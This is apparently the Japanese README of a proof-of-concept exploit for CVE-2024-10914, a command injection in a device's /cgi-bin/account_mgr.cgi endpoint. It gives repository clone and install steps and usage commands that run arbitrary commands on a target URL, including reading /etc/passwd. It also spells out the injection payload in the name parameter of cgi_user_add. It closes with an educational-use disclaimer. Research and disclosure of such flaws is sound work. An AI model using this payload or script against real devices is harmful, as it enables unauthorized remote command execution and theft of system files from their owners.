
CVE-2024-10914を悪用するためのPoC
エンドポイント /cgi-bin/account_mgr.cgi におけるコマンドインジェクション脆弱性のエクスプロイト。この脆弱性により、サニタイズされていないパラメータを介して影響を受けるシステム上で任意のコマンドを実行できます。
CVE-2024-10914 は、Web CGI インターフェースを持つデバイスに影響を与えるコマンドインジェクションの脆弱性です。脆弱なアプリケーションは、cgi_user_add リクエスト内の name パラメータを正しく検証しないため、攻撃者がシステムコマンドを注入し、アプリケーションの権限で実行される可能性があります。
リポジトリをクローンして依存関係をインストールします:
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt
または手動でインストール:
pip install requests
スクリプトは2つの引数を提供します:
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMANDO>
-u, --url (必須): ターゲットのURL (例: http://192.168.1.1)-c, --command (オプション): 実行するコマンド (デフォルト: id)id コマンドを実行:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1
カスタムコマンドを実行:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"
ファイル一覧を表示:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"
エクスプロイトは、以下のペイロードで脆弱なエンドポイントにGETリクエストを送信します:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMANDO>; "
空の文字列が引用符で閉じられ、希望するコマンドが注入され、サーバーのコンテキストで実行されます。
スクリプトは以下を表示します:
このコードは教育およびセキュリティ研究の目的のみで提供されています。明示的な許可があるシステムでのみ使用してください。このエクスプロイトの無許可の使用は、現地の法律に違反し、犯罪を構成する可能性があります。著者は、このツールの誤用について一切の責任を負いません。
SS3K
未指定